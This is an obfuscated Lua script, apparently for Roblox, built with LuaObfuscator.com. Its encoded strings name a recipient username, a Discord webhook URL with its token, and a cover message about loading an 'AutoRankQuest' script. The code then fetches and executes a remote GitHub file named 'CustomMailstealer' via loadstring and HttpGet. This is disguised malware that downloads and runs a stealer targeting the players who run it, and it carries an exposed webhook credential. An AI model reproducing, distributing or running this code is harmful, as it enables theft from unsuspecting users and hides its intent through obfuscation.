--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.2) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...) return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33) if v33 then local v84=0 -0 ;local v85;while true do if (v84==(0 -0)) then v85=(v31/((3 -1)^(v32-(2 -1))))%(((559 + 62) -(555 + 64))^(((v33-(932 -(857 + 74))) -(v32-(569 -(367 + 201)))) + (928 -(214 + 713)))) ;return v85-(v85%1) ;end end else local v86=0 + 0 ;local v87;while true do if (v86==(0 + 0)) then v87=2^(v32-(878 -((401 -119) + (1660 -(68 + 997))))) ;return (((v31%(v87 + v87))>=v87) and ((2908 -(226 + 1044)) -((6631 -5108) + 114))) or 0 ;end end end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24() local v34=117 -(32 + 85) ;local v35;local v36;local v37;local v38;while true do if (v34==(0 + 0)) then v35,v36,v37,v38=v1(v16,v19,v19 + 1 + (182 -(67 + 113)) );v19=v19 + (961 -(892 + 48 + 17)) ;v34=2 -1 ;end if (v34==(1 -0)) then return (v38 * 16777216) + (v37 * (120312 -54776)) + (v36 * (606 -(87 + 263))) + v35 ;end end end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29() local v39=0;local v40;local v41;local v42;local v43;local v44;local v45;while true do local v66=0;local v67;while true do if (v66~=0) then else v67=396 -(115 + 281) ;while true do if (0==v67) then local v99=0;while true do if (v99~=1) then else v67=1;break;end if (v99==0) then if (v39==(0 -0)) then local v138=0;while true do if (v138~=2) then else v39=1;break;end if (v138==1) then local v168=0 + 0 ;while true do if (v168~=(0 -0)) then else v42={};v43={v40,v41,nil,v42};v168=1 -0 ;end if (v168~=(1 -0)) then else v138=5 -3 ;break;end end end if (0~=v138) then else v40={};v41={};v138=286 -(134 + 151) ;end end end if (v39~=(1666 -(970 + 695))) then else local v139=0;while true do if (v139==(0 -0)) then v44=v24();v45={};v139=1;end if (v139==1) then for v176=1,v44 do local v177=0;local v178;local v179;local v180;local v181;local v182;while true do if (1~=v177) then else v180=nil;v181=nil;v177=1992 -(582 + 1408) ;end if (v177~=(6 -4)) then else v182=nil;while true do if (v178==2) then while true do if (v179==(0 -0)) then v180=0 -0 ;v181=nil;v179=1825 -(1195 + 629) ;end if (v179~=1) then else v182=nil;while true do if (v180==(1 -0)) then if (v181==(242 -(187 + 54))) then v182=v22()~=0 ;elseif (v181==(782 -(162 + 618))) then v182=v25();elseif (v181==(3 + 0)) then v182=v26();end v45[v176]=v182;break;end if (0~=v180) then else local v195=0;local v196;local v197;while true do if (v195~=0) then else v196=0 + 0 ;v197=nil;v195=1 -0 ;end if ((1 -0)~=v195) then else while true do if (v196==0) then v197=0;while true do if (v197==0) then local v209=0 + 0 ;while true do if (v209~=(1637 -(1373 + 263))) then else v197=1001 -(451 + 549) ;break;end if (v209~=(0 + 0)) then else v181=v22();v182=nil;v209=1 -0 ;end end end if (v197~=(1 -0)) then else v180=1385 -(746 + 638) ;break;end end break;end end break;end end end end break;end end break;end if (v178==(0 + 0)) then local v190=0;while true do if (v190==(1 -0)) then v178=342 -(218 + 123) ;break;end if (v190==(1581 -(1535 + 46))) then v179=0 + 0 ;v180=nil;v190=1 + 0 ;end end end if (v178~=1) then else local v191=0;while true do if (v191==0) then v181=nil;v182=nil;v191=1;end if (v191~=1) then else v178=562 -(306 + 254) ;break;end end end end break;end if (v177==(0 + 0)) then v178=0 -0 ;v179=nil;v177=1468 -(899 + 568) ;end end end v43[3]=v22();v139=2 + 0 ;end if ((4 -2)~=v139) then else v39=2;break;end end end v99=604 -(268 + 335) ;end end end if (v67==(291 -(60 + 230))) then if (v39==(574 -(426 + 146))) then local v116=0;local v117;while true do if (v116~=(0 + 0)) then else v117=0;while true do local v142=1456 -(282 + 1174) ;while true do if (v142==(811 -(569 + 242))) then if (v117==(2 -1)) then return v43;end if (v117==(0 + 0)) then for v183=1,v24() do local v184=0;local v185;local v186;local v187;while true do if ((1024 -(706 + 318))==v184) then v185=1251 -(721 + 530) ;v186=nil;v184=1272 -(945 + 326) ;end if (v184~=1) then else v187=nil;while true do if ((0 -0)~=v185) then else local v192=0;local v193;while true do if (0~=v192) then else v193=0;while true do if (v193~=0) then else local v203=0 + 0 ;while true do if (v203~=(701 -(271 + 429))) then else v193=1;break;end if (v203~=0) then else v186=0 + 0 ;v187=nil;v203=1501 -(1408 + 92) ;end end end if (v193~=1) then else v185=1087 -(461 + 625) ;break;end end break;end end end if (v185~=(1289 -(993 + 295))) then else while true do if (v186==0) then v187=v22();if (v21(v187,1 + 0 ,1)~=(1171 -(418 + 753))) then else local v198=0 + 0 ;local v199;local v200;local v201;local v202;while true do if (v198~=(0 + 0)) then else v199=0 + 0 ;v200=nil;v198=1 + 0 ;end if (v198==1) then v201=nil;v202=nil;v198=531 -(406 + 123) ;end if (v198~=(1771 -(1749 + 20))) then else while true do if (v199~=(1 + 2)) then else if (v21(v201,1325 -(1249 + 73) ,3)~=(1 + 0)) then else v202[4]=v45[v202[4]];end v40[v183]=v202;break;end if (v199==(1145 -(466 + 679))) then local v205=0;local v206;while true do if (v205~=0) then else v206=0;while true do if (v206~=0) then else local v215=0 -0 ;while true do if (v215==1) then v206=1;break;end if (v215~=0) then else v200=v21(v187,5 -3 ,1903 -(106 + 1794) );v201=v21(v187,2 + 2 ,6);v215=1;end end end if (v206==1) then v199=1 + 0 ;break;end end break;end end end if (v199~=2) then else local v207=0;while true do if (0==v207) then local v212=0;while true do if (v212~=(2 -1)) then else v207=2 -1 ;break;end if (v212==(114 -(4 + 110))) then if (v21(v201,585 -(57 + 527) ,1)==1) then v202[2]=v45[v202[1429 -(41 + 1386) ]];end if (v21(v201,2,105 -(17 + 86) )==1) then v202[3]=v45[v202[3]];end v212=1;end end end if (v207~=1) then else v199=3 + 0 ;break;end end end if (v199~=(1 -0)) then else local v208=0 -0 ;while true do if ((166 -(122 + 44))~=v208) then else v202={v23(),v23(),nil,nil};if (v200==0) then local v213=0;local v214;while true do if ((0 + 0)==v213) then v214=0;while true do if (v214==(0 + 0)) then v202[5 -2 ]=v23();v202[69 -(30 + 35) ]=v23();break;end end break;end end elseif (v200==(1 + 0)) then v202[3]=v24();elseif (v200==2) then v202[3]=v24() -((1259 -(1043 + 214))^(60 -44)) ;elseif (v200~=(1215 -(323 + 889))) then else local v224=0 -0 ;local v225;while true do if (v224==0) then v225=580 -(361 + 219) ;while true do if ((320 -(53 + 267))==v225) then v202[3]=v24() -((1 + 1)^(429 -(15 + 398))) ;v202[986 -(18 + 964) ]=v23();break;end end break;end end end v208=1;end if (v208==1) then v199=2;break;end end end end break;end end end break;end end break;end end break;end end end for v188=1,v24() do v41[v188-(3 -2) ]=v29();end v117=1;end break;end end end break;end end end break;end end break;end end end end v30=nil;v18=7;end if (v18==4) then function v25() local v46=v24();local v47=v24();local v48=(4 -3) + 0 ;local v49=(v21(v47,1 + 0 ,870 -(20 + 830) ) * ((1 + 1 + (977 -(553 + 424)))^32)) + v46 ;local v50=v21(v47,147 -(116 + 10) ,3 + 28 );local v51=((v21(v47,32)==(739 -(542 + 196))) and  -(1 -0)) or (1 + 0) ;if (v50==(0 + 0)) then if (v49==(0 + 0)) then return v51 * (0 -0) ;else v50=2 -1 ;v48=0 -0 ;end elseif (v50==2047) then return ((v49==(1551 -(1126 + 425))) and (v51 * ((406 -(118 + 287))/(0 -0)))) or (v51 * NaN) ;end return v8(v51,v50-(2144 -(118 + 1003)) ) * (v48 + (v49/((5 -3)^(429 -(142 + 235))))) ;end v26=nil;function v26(v52) local v53;if  not v52 then local v88=0 + 0 + 0 ;while true do if ((0 + 0)==v88) then v52=v24();if (v52==0) then return "";end break;end end end v53=v3(v16,v19,(v19 + v52) -1 );v19=v19 + v52 ;local v54={};for v68=1 + 0 + 0 , #v53 do v54[v68]=v2(v1(v3(v53,v68,v68)));end return v6(v54);end v18=5;end if (v18==2) then function v22() local v55=v1(v16,v19,v19);v19=v19 + 1 ;return v55;end v23=nil;function v23() local v56=0 -(731 -(476 + 255)) ;local v57;local v58;while true do if (v56==(2 -1)) then return (v58 * (1585 -(797 + 532))) + v57 ;end if (v56==(0 -0)) then v57,v58=v1(v16,v19,v19 + 1 + 1 );v19=v19 + (4 -2) ;v56=4 -3 ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v59) if (v1(v59,2)==79) then local v89=0;while true do if (v89==0) then v20=v0(v3(v59,1,1));return "";end end else local v90=v2(v0(v59,16));if v20 then local v94=v5(v90,v20);v20=nil;return v94;else return v90;end end end);v18=1;end if (v18==7) then function v30(v60,v61,v62) local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...) local v70=v63;local v71=v64;local v72=v65;local v73=v28;local v74=1;local v75= -1;local v76={};local v77={...};local v78=v12("#",...) -1 ;local v79={};local v80={};for v91=0,v78 do if (v91>=v72) then v76[v91-v72 ]=v77[v91 + 1 ];else v80[v91]=v77[v91 + 1 ];end end local v81=(v78-v72) + 1 ;local v82;local v83;while true do v82=v70[v74];v83=v82[1];if (v83<=4) then if (v83<=1) then if (v83>0) then v80[v82[2]]=v82[3];elseif ((v82[3]=="_ENV") or (v82[3]=="getfenv")) then v80[v82[2]]=v62;else v80[v82[2]]=v62[v82[3]];end elseif (v83<=2) then v80[v82[2]]();elseif (v83==3) then local v123=0;while true do if (v123==0) then v80[v82[2]]=v82[3];v74=v74 + 1 ;v82=v70[v74];v62[v82[3]]=v80[v82[2]];v123=1;end if (v123==5) then v82=v70[v74];v62[v82[3]]=v80[v82[2]];v74=v74 + 1 ;v82=v70[v74];v123=6;end if (v123==4) then v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v82[3];v74=v74 + 1 ;v123=5;end if (v123==3) then v80[v82[2]]=v82[3];v74=v74 + 1 ;v82=v70[v74];v62[v82[3]]=v80[v82[2]];v123=4;end if (v123==1) then v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v82[3];v74=v74 + 1 ;v123=2;end if (v123==6) then if ((v82[3]=="_ENV") or (v82[3]=="getfenv")) then v80[v82[2]]=v62;else v80[v82[2]]=v62[v82[3]];end v74=v74 + 1 ;v82=v70[v74];if ((v82[3]=="_ENV") or (v82[3]=="getfenv")) then v80[v82[2]]=v62;else v80[v82[2]]=v62[v82[3]];end break;end if (v123==2) then v82=v70[v74];v62[v82[3]]=v80[v82[2]];v74=v74 + 1 ;v82=v70[v74];v123=3;end end else v62[v82[3]]=v80[v82[2]];end elseif (v83<=6) then if (v83==5) then local v102=0;local v103;while true do if (0==v102) then v103=v82[2];v80[v103]=v80[v103](v13(v80,v103 + 1 ,v75));break;end end else local v104=0;local v105;local v106;while true do if (v104==0) then v105=v82[2];v106=v80[v82[3]];v104=1;end if (v104==1) then v80[v105 + 1 ]=v106;v80[v105]=v106[v82[4]];break;end end end elseif (v83<=7) then local v107;local v108,v109;local v110;v80[v82[2]]=v82[3];v74=v74 + 1 ;v82=v70[v74];v110=v82[2];v108,v109=v73(v80[v110](v13(v80,v110 + 1 ,v82[3])));v75=(v109 + v110) -1 ;v107=0;for v118=v110,v75 do local v119=0;while true do if (v119==0) then v107=v107 + 1 ;v80[v118]=v108[v107];break;end end end v74=v74 + 1 ;v82=v70[v74];v110=v82[2];v80[v110]=v80[v110](v13(v80,v110 + 1 ,v75));v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]();v74=v74 + 1 ;v82=v70[v74];do return;end elseif (v83==8) then do return;end else local v126=0;local v127;local v128;local v129;local v130;while true do if (1==v126) then v75=(v129 + v127) -1 ;v130=0;v126=2;end if (0==v126) then v127=v82[2];v128,v129=v73(v80[v127](v13(v80,v127 + 1 ,v82[3])));v126=1;end if (v126==2) then for v165=v127,v75 do v130=v130 + 1 ;v80[v165]=v128[v130];end break;end end end v74=v74 + 1 ;end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!0C3O0003083O00557365726E616D6503103O00626C6F786672756974676F643032313703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F313231333438312O34333433353631303134332F336A7A4F7848614D594A484B4547772O4E336F4A4264416F62755456416A3O302D5F326930714C424A71687638566B5532416942335A30674F62443770527942464D64030F3O00475F4C6F6164696E675363722O656E032B3O00486F6C6420746967687421205765277265206E6F77206C6F6164696E6720746865207363726970743O2E030D3O00475F576562682O6F6B4E616D65030D3O004175746F52616E6B5175657374030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034B3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269437573746F6D2F6D61696E2F437573746F6D4D61696C737465616C657200103O0012033O00023O00124O00013O00124O00043O00124O00033O00124O00063O00124O00053O00124O00083O00124O00073O00124O00093O00122O0001000A3O00200600010001000B0012070003000C6O000100039O0000026O000100016O00017O00",v9(),...);
